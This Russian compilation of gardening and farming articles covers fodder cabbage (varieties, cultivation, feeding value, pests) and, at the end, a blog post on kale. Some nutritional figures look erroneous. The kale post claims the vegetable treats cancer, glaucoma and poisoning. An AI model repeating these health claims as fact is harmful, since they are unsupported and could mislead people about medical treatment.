6 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Кормовая капуста фото

Капуста кормовая: описание, особенности выращивания, сорта, фото

Поздней осенью, когда поля уже пусты, а трава на пастбищах заметно пожухла, можно увидеть плантации сочных и свежих растений. Это капуста кормовая, которая не боится заморозков. При переходе на зимний рацион растение позволяет животноводам максимально долго обеспечивать зелеными кормами своих подопечных. Кормовую капусту очень любят коровы, козы, кролики и прочая живность на скотном дворе.

Немного истории

Европа обратила внимание на крупное сочное растение очень давно. Первые упоминания о нем попадаются в античной греческой и римской литературе. Из приморских европейских стран культура постепенно разошлась по миру. Эта версия событий основана на том, что многие виды дикой капусты встречаются только на морских побережьях Европы, в Азии их нет.

В Россию капуста кормовая попала примерно в 18-м столетии. Однако выращивали ее не многие. Эта культура долгое время не приживалась в нашей стране, так как люди просто не понимали, что небольшое вложение средств и труда многократно окупится качественными кормами для животных. На сегодняшний день культуру выращивают не только в России, но и на полях Украины, Молдовы, Азербайджана, Эстонии и так далее. Более того, многие сорта перебрались за океан и прекрасно растут в Америке, Африке, Новой Зеландии и Австралии, приспособившись к местным климатическим условиям.

Общее описание культуры

Кормовая капуста, название которой говорит само за себя, не используется в салатах. Ее листья слишком жесткие для этого. Это крестоцветное растение из семейства капустных, особенностью которого является полное отсутствие кочанов. В научных кругах вид известен под названием Brassica subspontanea Lizg.

Для двулетней культуры с перекрестным опылением характерен плотный стержневой ветвистый корень с утолщением в верхней части. У растения прямостоячая толстая кочерыжка (стеблеплод), ее диаметр может достигать 5 см. Стебель может иметь цилиндрическую или веретенообразную форму. Его высота — от 35 до 200 см. Листья капусты лировидные или яйцевидно-удлиненные. Они крупные и широколанцетные. Существует две природные разновидности, которые отличаются степенью курчавости и цветом листьев:

  1. Шотландская – имеет гофрированные курчавые листья серо-зеленого окраса.
  2. Сибирская – менее курчавая, с листвой голубовато-зеленого окраса.

У обеих разновидностей черешки листьев внизу стеблеплода длинные, а вверху – укороченные.

Цветение, плоды кормовой капусты

Капуста кормовая цветет на втором году жизни. Почки, из которых пойдут цветоносные побеги, располагаются в пазухах стеблеплода. Цветоносные побеги высокие (до 160 см), ветвистые, с небольшим количеством листьев. Соцветием кормовой капусты является слабая рыхлая кисть. Ее длина составляет около 80 см.

После цветения появляется гладкий стручок цилиндрической формы. Это плод кормовой капусты. Внутри находятся округлые гладкие семена, окрас которых варьируется от сизо-серого до черного.

Для чего выращивать кормовую капусту?

Обратить внимание на кормовую капусту стоит уже хотя бы потому, что она позволяет использовать зеленые корма для животных даже после осенних заморозков. Но это не все полезные качества культуры. Капуста кормовая уникальна по питательным свойствам. Она содержит большое количество минеральных солей и витаминов. Если использовать ее как силос, то в корме будет почти 18 % протеина, более 15 % белков, 3,4 % жира и более 46 % безазотистого экстрактивного вещества.

В 1 кг листовой массы присутствует до 100 мг витамина С и более 42 мг витамина А. Здесь же содержится фосфор, кальций и сера, что делает кормовую капусту диетическим продуктом для животноводства. Животные и домашняя птица отлично едят силос из этой культуры. Он хорошо пахнет, легко переваривается и, благодаря высокому уровню белков и каротина, быстро насыщает.

Примечательно, что капуста кормовая не теряет своих свойств даже после замерзания. Оттаявшая листва остается упругой и не теряет цвет и вкусовые качества. Животные не отказываются от оттаявших зеленых кормов, что позволяет сократить время зимнего кормления. В некоторых европейских странах листву кормовой капусты искусственно подсушивают и хранят в виде высокобелкового сухого корма.

Зона распространения кормовой культуры

Многие фермеры задаются вопросом, как ведет себя в разных климатических зонах кормовая капуста? Фото возделанных полей получали и из холодных областей (Мурманская, Новосибирская), и из южных регионов нашей страны. В зависимости от климатических зон и условий полива урожайность культуры может колебаться от 300 до 950 центнеров фитомассы с 1 гектара. В удачных местах урожайность достигает 1500 центнеров зеленой массы с 1 га.

Основы агротехнологии

Госреестр России (2006 г.) включает сорт Веха и несколько голландских гибридов (Редбор и Рефлекс). Размещение культуры вносится в кормовой или овощной севооборот. Капуста кормовая высаживается после зернобобовых и зерновых культур. В крайнем случае, после трав. Иногда предшественниками бывают ранние овощные культуры, главное, чтобы их урожай снимался не позднее июня. В этом случае за вторую половину лета культура успевает сформировать хороший урожай. На одном месте кормовую капусту сажают раз в 3-4 года.

Выращивание кормовой капусты

Плантации для выращивания культуры закладывают тремя способами:

  1. Безрассадный способ, при котором кормовая капуста (семена) высаживается непосредственно в землю.
  2. Рассадное выращивание, когда в почву переносятся из рассадников 30-40-дневные растения. Рассада при высадке имеет 4-5 сформированных листочков.
  3. Рядовой способ, который разработан в Ленинградской области. В этом случае используют чистые почвы или высокоэффективные гербициды. Посев проводят рядовым способом, прореживание не выполняют. Загущенные посевы влияют на формирования стеблеплода. В наземной фитомассе увеличивается процент листьев.

Безрассадный способ: особенности

Безрассадное выращивание начинают ранней весной. Почву под семена подготавливают, выравнивают и прикатывают. Для внесения в почву посадочного материала используют овощные сеялки. Применяют широкорядный посев. Междурядье — до 70 см. На 1 га высевают от 1,5 до 4 кг семян. Глубина высева — до 3 см.

Через несколько дней после посева требуется боронование или разрушение почвенной корки мотыгами. При появлении всходов проводится рыхление междурядий. Последние обрабатывают за весь период вегетации до 4 раз. Вместе с этим осуществляют азотные подкормки. Для уборки можно использовать силосоуборочные комбайны без измельчающего аппарата. Снимается урожай с августа до декабря (в зависимости от сроков посева).

Рассадный способ: особенности

Рассадный способ выращивания кормовой капусты позволяет увеличить урожайность зеленой массы. Высадка рассады в грунт проводится в те же сроки, что и сев семян. Этот метод продлевает период роста растений, что ведет к повышению кормовой урожайности.

Рассаду выращивают холодным способом (в неотапливаемых рассадниках). Применяют ленточный и рядовой способ сева. Когда сформировались 1-2 листа, молодые растения прореживают. На этапе 2-3 листьев выполняют подкормку. На поле рассада попадает при 4-5 сформировавшихся листах.

Высадкой рассады занимаются после окончания ярового сева зерновых. Используют широкорядный метод с междурядьями 70 см. Расстояние в ряду между растениями – до 40 см. Если почвы тяжелые, то рассаду высаживают на гребни.

Через неделю после высадки заполняют места выпадов в рядах. За период вегетации культура требует 3-4 междурядные обработки. Первая – рыхление на 8 см в глубину, последующие – на 12-15 см.

Уборка урожая начинается после прекращения роста растения. Проводится она по мере надобности, в некоторых зонах ее растягивают до декабря.

Наиболее популярные сорта кормовой капусты

В промышленных масштабах в России выращивают следующие сорта кормовой капусты: Мозговая зеленая вологодская, Мозговая зеленая сиверская, Тысячеголовая, Подмосковная, Полярная, Веха.

На дачных участках листовую капусту выращивают не только на корм, но и с декоративными целями. Дачники часто выбирают листовой курчавый гибрид Редбор F1. Растение имеет пальмовидную форму и красивый бордовый цвет листьев.

Также хорошо на участках приживается гибрид Рефлекс F1. Его можно использовать не только для украшения участка, но и в салаты. У растения красивые кудрявые листья нежно-зеленого цвета.

Для небольших фермерских хозяйств основным вариантом остается капуста Веха кормовая. Она позволяет получить максимальные урожаи зеленой массы без использования дорогостоящих агротехнических приемов. Если культуре обеспечивают нормальный уход, то высокий урожай гарантирован.

Характеристика кормовой капусты

Кормовая капуста выращивается для домашнего скота. Сорт Протеор выращивается в разных регионах России. Подробное описание сорта рассмотрим в статье.

Характеристика кормовой капусты

Характеристика сорта

Кормовая капуста – особенно ценный продукт при птицеводстве. Также используется в качестве корма для животных.

  • имеет прочный стебель и длинные листья;
  • морозостойкий (выдерживает до — 14°С);
  • простой в уходе;
  • нетребователен к климатическим и погодным условиям;
  • отлично переносит сильную засуху.

Протеэор имеет высокий уровень урожайности – до 1 кг сухого вещества с 1 м2. Может высаживаться как в открытом грунте, так и в теплице.

Описание куста

Кормовая капуста представляет собой растение из листьев и утолщенного стебля. Для кормов используются обе части.

Протеор – растение двухлетнее. Обычно достигает высоты 100-110 см, из-за чего относится к высокорослым овощным культурам. В первый год стебель имеет цилиндричнообразную форму, во второй – веретенообразную. На нем образуются ветки, если капуста растет в увлажненной почве.

Листья достигают длины 50 см, ширины – 30-40 см. Листовая пластинка имеет легкий восковый налет. Черешки от 15 до 40 см.

На второй год прорастания Протэора на стебле появляются новые побеги. На них образовываются цветки, диаметром до 5 см.

Состав

Химический состав и пищевая ценность::

  • обладает молокогонным свойством;
  • содержит 12-15 % сухих веществ;
  • вместительность сахара — 4-7 %;
  • наличие 60-75% аскорбиновой кислоты, которая улучшает пищеварение животного;
  • имеет каротин, витамин В, прочие минеральные компоненты;
  • содержит до 4% белка;
  • есть до 2-3% клетчатки.

По питательности равна овсянке, но намного питательнее, чем свекла или морковь. Это очень важно для скота, что производит молоко. Коровам нужно скармливать в сутки не меньше 15 кг кормовой капусты. Это благоприятно повлияет на образование молока, ускорит этот процесс. Также повыситься качества молочного продукта.

Плоды можно хранить в холодном помещении без жестких ограничений в температурном режиме. Для этого отлично подойдут погреба и подвальные помещения.

Кормовая капуста не требовательна в уходе. Достаточно придерживаться основных правил посадки и выращивания, чтобы получить качественный сорт и отличную урожайность.

Выбор семян

Нормальный вес 1000 семян – 3-5 г. После покупки их нужно проверить на качество. Для этого семена опускают в подогретую до 50 °С воду. Ждут 7-10 минут, после чего смотрят: если семена опустились на дно емкости, они подходят для высадки. Если они вспылили, то их следует выбросить, т.к. они пустые и не дадут урожая.

Подготовка к посадке

Почву нужно подготовить к посадке

Перед посадкой семена и почву лучше подготовить. Их обрабатывают раствором марганца. К нему можно добавить борную кислоту.

Для обработки семян берут 5 г марганцовки и 2 г борной кислоты. Их разводят в 10 л теплой, отстоянной воды. Наливают в широкую емкость, куда также помещают семена. Они должны там находиться максимум 15 минут, после чего их моют и сушат.

Для полива берут 15 г марганца и 5 г борной кислоты. Разводят в ведре воды. Расход на 1 м2 – 2 л раствора в разбавленном виде. Пропорция разбавления – 1 к 2.

Посадка

Высаживают кормовую капусту Протэор со средины апреля по начало июля. Пересадку осуществляют, когда на рассаде появится минимум 5 настоящих листиков.

  1. Для посадки выбирают место, где нет тени и есть постоянный доступ к солнечному свету. Важно, чтобы уровень грунтовых вод был не менее 1 м.
  2. Кислые грунты не подходят. В обратном случае проводят известкование. Но лучше изначально выбрать средние по механическому составу и органично богатые почвы. Оптимальный вариант – торфяники.
  3. Всходы появляются спустя 10 дней. Схема посадки – 80*80 см.
  4. На 1 м2 можно сажать не больше 7 кустов, чтобы их корневые системы не сплелись. Ширина между рядами – 45 см.

Сбор урожая происходит спустя 100 дней после посадки семян. Это приблизительно с сентября по ноябрь.

Полив

Кормовая капуста – влаголюбивое растение. Для полива нужно 0,5 л воды под один куст (2-3 раза в неделю). Воду берут теплую и отстоянную.

Рыхление

Необходимая процедура при выращивании кормовой капусты:

  • обогащает почву кислородом;
  • удаляет почвенную корку после поливов или осадков;
  • способствует быстрому росту куста.

Рыхление также нужно для борьбы с сорняками. Если их вовремя не устранить, возможно поражение корневой системы или приостановка роста овощной культуры.

Подкормки

Для овощной культуры важны азотные удобрения. В качестве удобрительного вещества часто берут аммиачную селитру. Для первой подкормки 5 г вещества разбавляют в 1 л воды. Эта подживка осуществляется, если капуста кормовая уже имеет 3-4 листика.

Вторая подкормка проводиться на стадии 6-7 листков: 3 г аммиачной селитры и 8 г суперфосфата разводят в 2 л воды. Норма расхода – 0,3 л для ростка.

Вредители и болезни

Благодаря отличной пищевой ценности, на овощ часто нападают вредители. С ними нужно своевременно бороться. Некоторые садоводы этим пренебрегают, т.к. капуста выращивается специально для животных. Они не осознают, что негативное, паразитическое влияние вредителей позже отражается на качестве, запахе, вкусе молока и состоянии скота.

Вредители

Кормовую капусту могут поражать такие вредители:

  1. Крестоцветные блошки. Это небольшие насекомые черного цвета, которые поедают листья овощной культуры. Признак их влияния – множество маленьких дыр по поверхности листовой пластины. Для борьбы с ними используют смесь золы и табачной пыли в соотношении 1 к 1. Поливать водой не нужно, т.к. используется способ сухого опыления листьев. Делать это нужно рано утром. Желательно, чтобы на поверхности растения была роса.
  2. Капустная моль. Бабочки коричневого или серого оттенка с длинным тельцем. Прогрызают наружную часть листьев и поедают ткани. Для борьбы с ними применяется «Лепидоцид». Средство разводится в воде согласно инструкции. Наноситься способом капельного орошения на поверхность пораженных листьев.
  3. Рапсовый цветоед. Жук черного цвета размером до 1 см. Наносит вред бутонам и семенам. После его воздействия может погибнуть до 70% семенного материала. Обработку осуществляют на основе 0,2-% этафоса и 0,04-% андометрина.
  4. Капустная муха. Внешне выглядит как обычная муха коричневого цвета. Питается зеленью корешков. Вначале поедает мягкую, сочную часть стебля, после чего может поражать листья. Чтобы избавиться от капустной мухи, берут средство «Топаз». 1 ампулу вещества разводят в 10 л воды. Также используется «Искра» и «Карбофос».

Кормовая капуста: фото, описание сортов, технология сбора

Кормовая капуста – ценное растение. Она дает большой урожай высокопитательного корма. На 100 кг зеленой массы приходится 1,76 кг чистого перевариваемого протеина с богатым составом аминокислот. У культуры много различных биологических типов, поэтому в России ее выращивают от Заполярья до субтропиков.

Описание кормовой капусты

Кормовая капуста – это двулетняя культура семейства Капустные. Высокое растение состоит из цилиндрического и веретеновидного (он появляется на второй год жизни) стебля. В высоту достигает 2 м, а в ширину – 10 см.

Имеет гладкие листья, покрытые воскообразным налетом. По форме и цвету листья бывают разные в зависимости от сорта. Они не формируют кочан, а прикрепляются к стеблю черенками.

На фото – кормовая капуста.

Стебель у кормовой капусты грубый, но внутри нежный и сочный, поэтому для корма животных используют и его.

Такая капуста перекрестноопыляемая. Женские и мужские цветки формируются на разных растениях. Соцветие представляет собой рыхлую кисть, в длину достигающую 80 см. На ней находятся белые или желтоватые цветки размером до 5 см. После опыления начинается формирование цилиндрического стручка (плода).

Выращивание требует определенных затрат, но они обычно многократно окупаются. Среди плюсов использования растения в качестве корма можно выделить такие:

  1. Культура неприхотлива по сравнению с другими видами капусты.
  2. Для корма используются и листья, и стебель.
  3. Подходит для вскармливания практически любых видов скота и птиц.
  4. Сравнительно большой урожай с единицы площади (около 300-350 кг с 100 кв. м). Белокочанная капуста способна давать более высокие урожаи, но ее выращивание требует несоизмеримо больших затрат.
  5. Сельскохозяйственные животные хорошо поедают кормовую капусту.
  6. При включении растения в рацион коровы и козы дают больше молока. Также кормление такой капустой куриц повышает яйценоскость.
  7. Высокая пищевая ценность. Эта культура лишь немного уступает овсянке, но при этом опережает абсолютно все корнеплоды.
  8. Содержит витамины, минералы, аминокислоты, клетчатку.
  9. Имеет длительный срок хранения. Растение используют, даже когда оно промерзло.
  10. Обладает отличной морозоустойчивостью.

Кормовая капуста содержит небольшую концентрацию горчичных масел. Они нарушают работу эндокринной системы как у животных, так и у людей. Поэтому в рацион ее включают дозировано. Также при большой доле кормовой капусты в рационе скота горчичные масла начинают проникать в молоко, из-за чего оно приобретает горьковатый вкус.

Чтобы увеличить надои и сохранить качество молока, следят за максимальной суточной дозой кормовой капусты. Ее доля не должна превышать 25% от общей массы зеленого корма. Это примерно 15-20 кг.

Процентное содержание полезных веществ в кормовой капусте:

  • около 15% белков;
  • 17,5% протеина;
  • 3,4% жира;
  • более 40% безазотистого экстрактивного вещества;
  • около 100 мг витамина С на 1 кг зеленой массы;
  • почти 50 мг витамина А на 1 кг зеленой массы.

Также в этом растении присутствуют сера, кальций и фосфор, благодаря чему оно считается ценным продуктом для применения в животноводстве. Оно хорошо переваривается, быстро насыщает благодаря белкам и каротину и имеет приятный запах.

Важно! После замерзания растение сохраняет свойства. Животное ест оттаявшую капусту так же хорошо, как свежую. Некоторые фермерские хозяйства высушивают листву, а затем добавляют ее в корм в качестве высокобелковой добавки.

Как собирать кормовую капусту

Капусту скашивают под корень, так как все составляющие пригодны для использования. Собирать урожай стараются максимально поздно, ведь именно в этом заключается смысл выращивания культуры – для обеспечения животных свежим кормом поздней осенью и зимой.

Признаком того, что капуста готова к уборке, считается пожелтение нижней части растения. Это происходит примерно через 100 дней после посадки. Зачастую к этому времени на полях уже нет других культур, так как первые заморозки уже прошли. В средней полосе этот период выпадает примерно на середину ноября.

Важно! Если растение полностью замерзло, перед кормлением его обязательно размораживают.

После сбора кормовую капусту дают животным в свежем виде или в составе силоса. В первом случае ее отправляют в подвал. Строгих требований к температурным показателям нет, погреб лишь регулярно проветривают. Там урожай способен храниться до февраля. Также свежую капусту хранят под открытым небом в штабелях. Перед кормежкой ее размораживают.

При силосовании растение измельчают и используют в качестве добавки к другому корму.

Сорта кормовой капусты

Известно много сортов и гибридов кормовой капусты. Наиболее подходящими для выращивания в России считаются:

  1. Мозговая зеленая. Стебли мощные и имеют фиолетовый цвет. Растение формирует много больших листьев фиолетово-зеленого цвета. Сорт не способен переносить длительную засуху и слабо противостоит вредителям.
  2. Мозговая зеленая сиверская. Этот сорт вывели специалисты Санкт-Петербурга из Мозгового зеленого. Морщинистые, большие листья овальной формы закреплены на длинных черенках. Стебель прямой, широкий, без разветвлений. Отличительная особенность – сравнительно крупный размер. На боковых почках нет побегов. Растение подвержено бактериозу и склеротинии. Сорт более урожайный, чем предыдущий.
  3. Тысячеголовая, или тысячелистная. Капуста имеет обильную облиственность, хотя сами листья небольшие. Хорошо ветвится и имеет красивую форму. Нормально переносит бактериоз.
  4. Веха. Нетребовательный к уходу сорт подходит для выращивания на небольших фермерских хозяйствах, где нет возможности использовать серьезную сельскохозяйственную технику. Быстро растет и дает хороший урожай. Урожайность зеленой массы – 566-960 ц/га, сухого вещества – 76,0-168,9 ц/га. Содержание белка в сухом веществе – 11,4%, перевариваемость – 77,8%. Вегетационный период – 142-180 дней. Слабо поражается пероноспорозом, сосудистым бактериозом и вредителями.
  5. Boma (Бома). Засухоустойчивый сорт дает самый большой урожай – до 1 т со 100 кв. м. Растение хорошо переносит морозы до -14°С.

Заключение

Кормовую капусту дают в пищу абсолютно всем видам сельскохозяйственных животных и птиц. Таким образом значительно ускоряют их рост и продуктивность, включая количество яиц и объем надоев. Это растение способно переносить практически любые климатические условия, а его выращивание не требует больших трудовых и материальных затрат.

Мой цветник!

Кормовая капуста: сорта и выращивание

Кормовая капуста происходит из Восточного Средиземноморья. Широко распространена в европейских странах, а также в Америке, Азии, Африке, Австралии и Новой Зеландии.

В России её можно возделывать от Заполярья до субтропиков, в том числе и в Центральном Черноземье, так как она представлена большим разнообразием морфологических и биологических типов. Это одна из наиболее ценных кормовых культур, охотно поедается скотом в свежем виде и хорошо силосуется.

По питательной ценности она превосходит все кормовые корнеплоды. В 100 кг зелёной массы содержится 16 к. ед.; 1,8 кг переваримого протеина и 8 г каротина; имеются также витамины А,В,С и др. На 1 к. ед. приходится 110-115 г переваримого протеина. При хорошем увлажнении и плодородии почвы кормовая капуста может давать урожай до 500-800 ц/га зелёной массы с содержанием 12-14% сухих веществ.

Кормовая капуста в поле

Морфобиологические особенности.

Кормовая капуста (Brassica subspontanea Lizg.) — двулетнее перекрёстноопыляемое растение семейства капустные — Brassicaceae.

Корень стержневой, утолщённый в верхней части, разветвлённый.

Стебель (стеблеплод) прямостоячий, толстый (3-5 см в диаметре), грубый, цилиндрический или веретеновидный высотой от 30 до 200 см.

Листья крупные, лировидные, яйцевидно-удлинённые, широколанцетные, плоские или курчавые; окраска их может быть зелёной, сизовато-зелёной или фиолетово-зелёной; черешки внизу длинные, вверху короткие.

На второй год жизни из почек, расположенных в пазухах стеблеплода, вырастают ветвистые и слабооблиственные цветоносные побеги, высотой до 120-160 см.

Соцветие — рыхлая разветвлённая кисть длинной 50-80 см. Цветки жёлтые или беловатые.

Плод — гладкий, цилиндрический стручок длиной до 8-10 см. Семена округлые, гладкие, блестящие, несколько крупней, чем у брюквы или турнепса, окраска их может быть сизоватой, тёмно-серой, чёрной. Масса 1000 штук 3-6 г.

В культуре распространен подвид плосколистной капусты (В. subspotaea ssp. planifolia Lizq), реже используют подвид В. ssp. crispifolia Lizq. Растения первого подвида высокорослые, второго — низкие или среднерослые. Кормовая капуста от столовой кочанной отличается удлинённым (до 1,5-2,0 м) стеблем и крупными, не свёртывающимися в кочан листьями. Продолжительность вегетации в первый год жизни 140-160 дней, во второй — 80-90 дней.

Кормовая капуста очень холодостойка. Семена прорастают при температуре 3-5°С, молодые растения выдерживают заморозки до 3-6°С, может вегетировать при температуре 3-5°С. Лучший прирост зелёной массы происходит при 17-20°С. Она неплохо переносит летнюю жару, но рост её задерживается. С наступлением прохладной погоды она вновь усиленно растет, давая прирост зелёной массы до 15-20 ц/га и более в сутки.

Взрослые растения не погибают даже при морозах 10-15°С. Это позволяет хозяйствам продлить кормление животных зелёным витаминным кормом на 1,5-2 месяца.

Кормовая капуста высокотребовательна к плодородию почвы. Она предпочитает средние по механическому составу и богатые органическим веществом почвы с нейтральной или слабокислой реакцией почвенного раствора. Хорошо растёт на пойменных участках, осушенных и окультуренных торфяниках. На 100 ц зелёной массы кормовая капуста потребляет 28,6 кг азота, 10 кг фосфора, 46 кг калия и 28 кг кальция.

Капуста влаголюбива, но не переносит избыточного увлажнения. При недостатке влаги она значительно задерживается в росте, но за счёт хорошо развитой корневой системы может переносить кратковременную засуху. Период интенсивного роста у неё приходится на осень и совпадает с дождливой погодой, поэтому она обычно обеспечивает хорошую продуктивность. В тёплые и достаточно влажные годы кормовая капуста даёт очень высокие урожаи. В очень жаркие и сухие годы формирование надземной фитомассы задерживается и урожай бывает низким.

Сорта кормовой капусты.

В настоящее время в России возделывают 6 сортов кормовой капусты: Мозговая зелёная вологодская, Мозговая зелёная сиверская, Тысячеголовая, Подмосковная, Полярная, Веха.

Агротехнология.

Кормовую капусту размещают в кормовых или овощных севооборотах, после пропашных, зерновых и зернобобовых культур, многолетних и однолетних трав. При поукосных и пожнивных посевах предшественниками её могут быть озимые на зелёный корм, ранние овощные или другие однолетние культуры, убираемые в июне. Чтобы за вторую половину лета и осень кормовая капуста сформировала хороший урожай, после уборки озимых или ранневесенних промежуточных культур должно ещё оставаться 85-90 дней со среднесуточной температурой воздуха выше 5°С. Её нельзя возвращать на прежнее поле раньше, чем через 3-4 года, и размещать после капустных культур.

Сразу после уборки предшествующей культуры лущат стерню, затем пашут на полную глубину пахотного слоя (от 22 до 30 см). Весной почву боронуют, культивируют, шлейфуют или выравнивают и в день посева прикатывают.

Во влажных условиях заплывающие весной почвы фрезеруют на глубину 16-18 см или рыхлят плугами без отвалов. Установлено, что кормовая капуста хорошо реагирует на глубокое предпосевное фрезерование почвы и последующее прикатывание. На фрезерованном поле всходы появляются раньше, полевая всхожесть и урожай бывают выше, чем на перепаханном.

Удобрения вносят с учётом общего плодородия почвы и применения их под предшествующую культуру. Примерные нормы органических удобрений при внесении осенью под зябь 30-40 т/га. Минеральные удобрения обычно вносят в следующих дозах: N6O-9O, P45-6o, K45-6O. Положительно влияют на урожаи кормовой капусты бор и молибден. Семена обрабатывают микроэлементами перед посевом одновременно с протравливанием ядохимикатами.

Существует два способа закладки плантаций кормовой капусты — безрассадный (семенами) и рассадный. При первом способе капусту сеют рано весной овощными сеялками (одновременно с ранними яровыми культурами) по хорошо подготовленной, выравненной и прикатанной почве. Способ посева широкорядный с междурядьями 60-70 см, норма высева семян от 1,5 до 4 кг/га, глубина посева 2-3 см. На 1 кг семян в качестве балласта добавляют 10 кг мелкого просеянного гранулированного суперфосфата. Густоту формируют в фазе 3-4-х листьев по следующим схемам: 70×20 (70 тыс раст./га), 70×30 (50 тыс раст./га), 60×40 (40 тыс раст./га) и др.

При рассадном способе используют 35-40-дневную рассаду с 4-5 листьями. Для выращивания гектарной нормы рассады требуется 75-100 м рассадников и 0,6-0,7кг семян. Рассаду высаживают в поле рассадопосадочными машинами по схеме: 70×25-30 см. В этом случае несколько увеличивается период вегетации, экономится около 60% семян, легче бороться с сорняками и вредителями, но урожаи зелёной массы не всегда бывает выше, чем при посеве семенами. Рассадный способ требует также больших затрат ручного труда и увеличивает себестоимость корма.

В Северо-Западном НИИСХ (Лениградская область) разработан третий способ выращивания кормовой капусты. На чистых почвах или при наличии высокоэффективных гербицидов можно высевать её обычным рядовым способом без применения последующего прореживания. В таких загущенных посевах растения также формируют стеблеплоды с большой долей листьев в надземной фитомассе.

Уход за кормовой капустой, посеянной семенами широкорядным способом, начинается с боронования лёгкими сетчатыми боронами через 2-3 дня после посева. При образовании почвенной корки её разрушают ротационными мотыгами. Бороновать всходы целесообразно, если они сильно загущены.

После появления всходов и после высадки рассады начинают рыхление междурядий. В течение вегетационного периода проводят 2-4 междурядные обработки для борьбы с сорняками и создания рыхлого слоя почвы. Одновременно делают также подкормки азотными удобрениями. Кроме междурядных обработок, при необходимости применяют гербициды в зависимости от степени засоренности. Для борьбы с вредителями (крестоцветные блошки, капустная моль, рапсовый цветоед, капустная белянка, капустная муха) и с болезнями (кила, чёрная ножка, серая гниль, пятнистость листьев и стручков) применяют прежде всего агротехнические, а при необходимости и химические меры.

На зелёный корм капусту можно начинать скашивать в августе, но чаще всего её оставляют на более поздние сроки, когда все остальные культуры уже бывают убраны (октябрь, ноябрь, декабрь). Уборку целых растений можно проводить силосоуборочными комбайнами со снятым измельчающим аппаратом. Неизмельчённая кормовая капуста в свежем виде лучше поедается животными, чем измельчённая. Она не теряет своих кормовых достоинств и хорошо поедается даже после замораживания и оттаивания.

При силосовании целых растений потери сухого вещества уменьшаются, но чаще силосуют измельчённую массу в смеси с более сухими кормами. При необходимости кормовую капусту можно стравливать на корню в позднее осеннее время.

Семеноводство кормовой капусты ничем не отличается от кочанной капусты. Семенники закладывают на хорошо удобренных участках. После осветления маточники высаживают в среднеранние сроки по схеме 70×70 или 70×60 см. Под культиватор, плуг или вручную высаживают 20-30 тыс стеблеплодов на 1 га. При посадке их наклоняют в одну сторону вдоль междурядья.

Меры ухода.

Рыхление междурядий, подвязка к кольям, борьба с вредителями и болезнями, подкормки и орошение. По мере созревания семенники убирают в 2-3 приёма. При правильной агротехнологии урожайность семян достигает 10-12 ц/га.

В современных экономических условиях кормовая капуста может сыграть в ЦЧР важную роль как высокоурожайная ценная культура с большим коэффициентом размножения и малым расходом семян. Это особенно касается крестьянских (фермерских)хозяйств и частного сектора.

Кормовая капуста: фото

Приветствую всех читателей!

Хочу рассказать сегодня об удивительном овоще – капусте Кале (Kale — кейл) , о полезных свойствах, выращивании и немного фото этой красавицы. В комментариях к статье «Виды капусты с фото и названиями» Наталия спрашивает про капусту Кале. Как оказалось эта капуста просто кладезь разных полезных веществ и витаминов, находка для диетологов и просто людей, желающих поесть вкусно и с пользой.

Кале – листовая капуста, без кочана. Листья большие, кудрявые, похожи на салатные. Могут быть сизого, зелёного, красного цвета, после холодов становятся фиолетовыми.

Внешне очень декоративна и украсит любой огород. По другому её ещё называют браунколь или грунколь. Эта капуста считается «дикой». То есть родоначальницей всех разнообразных видов капусты.

Содержание статьи

  1. Полезные свойства капусты Кале
    1. Белки и жиры
    2. Витамины
    3. Минеральные вещества
  2. Приготовление капусты Кале
  3. Выращивание «дикой капусты Кейл»

В Америке и Англии её называют «Русская красная капуста», родина её остаётся неизвестной, во всех странах Кале – иностранка. А в России на долгие годы она была в забвении, но сейчас снова набирает популярность.

Полезные свойства капусты Кале

  1. Эта капуста содержит большое количество белка. В его состав входят все незаменимые аминокислоты (их 9) и 18 заменимых аминокислот. Блюдами из Кале вполне можно заменить мясо на столе, к тому же растительные белки легче и быстрее усваиваются, чем животные и дают намного больше пользы и энергии организму.
  2. В капусте Кале содежится незаменимая жирная кислота Омега – 3. Она необходима нашему организму, но сам он её не вырабатывает.

Конечно, их количество в какой-то степени зависит от почвы и условий, где растёт капуста. Но основные составляющие не меняются.

  1. Кальций. Его больше, чем в молоке. И намного легче усваивается, так как не отяжелён казеином. В капусте Кале кальций находится в легкоусвояемой форме.
  2. Магний. Кале очень богата магнием, как и все зелёные продукты.
  3. В капусте Кале нашли элемент сульфоран, который является лекарством от многих болезней, обладает антибактериальным эффектом.
  4. Индол-3-карбинол, останавливающий рост раковых клеток.
  5. А также калий, фосфор, натрий, железо, цинк, селен, медь – и всё это в одной капусте!

Последние исследования биомедиков говорят, Кале полезна при лечении рака, болезней глаз (особенно глаукомы), при различных химических отравлениях. Она является источником для повышения иммунитета, помогает уменьшить вредный холестерин в крови, улучшает работу желудка, может применятся в лечебном питании, как общеукрепляющее средство.

Выращивание «дикой капусты Кейл»

Растение это очень морозостойкое, осенью выдерживает сильные минусовые (-15◦С) температуры. После размораживания становится ещё вкуснее!

Выращивание её похоже на другие капусты.

Сортов не очень много, но выбрать есть из чего. Выбирайте подходящий для ваших условий.

  • Красная Кале – название говорящее, листья скрученные, красные.
  • Сибирская Кале – выносливый сорт, выдерживает низкие температуры, не боится вредителей.
  • Вьющаяся Кале – листья фигурные, морщинистые, сладкие и мягкие.
  • Премьер-Кале – морозоустойчива, быстро растёт.
  • Дино Кале – высокие, тонкие листья.
  • Тростевая Кале – мощные черешки, может вырасти до двух метров.

Обычно Кале созревает через 70-90 дней после всходов, потому выращивать рассаду дома не обязательно, можно сеять прямо в грунт под плёнку. Посев проводят в апреле, температуры для прорастания семян достаточно +5+6◦С.

А в конце мая подросшие растения можно рассадить на постоянное место.

Место желательно солнечное, на возвышении. Чтобы не застаивалась вода и холодный воздух. Почвы грюнколь любит рыхлые, с перегноем и золой, некислые.

Рассаживают растения на расстоянии 40 см друг от друга. При хорошем уходе кусты из листьев могут вырасти больше метра в высоту.

Основной уход заключается в поливах и рыхлении земли. Как любую капусту, желательно окучивать её несколько раз за лето.

Листья можно срезать всё лето, на месте старых вырастают новые. Хранятся листья в холодильнике около недели, но лучше их замораживать на хранение, вкус капусты только улучшается.

Если оставить несколько кустов зимовать, то весной капуста снова отрастёт и порадует ранним урожаем.

Вот такая необычная капуста Кале, полезная и вкусная. Выращивать её просто необходимо в каждом огороде!

Предлагаю почитать другие интересные статьи:

  • Капуста Брокколи – выращивание и уход
  • Выращивание дайкона — вам понравиться!
  • Корневой сельдерей — выращивание и уход
  • Озимый лук, посадка и уход
  • Декоративный лук — посадка и уход

С уважением, Софья Гусева.

Выращивание из семян

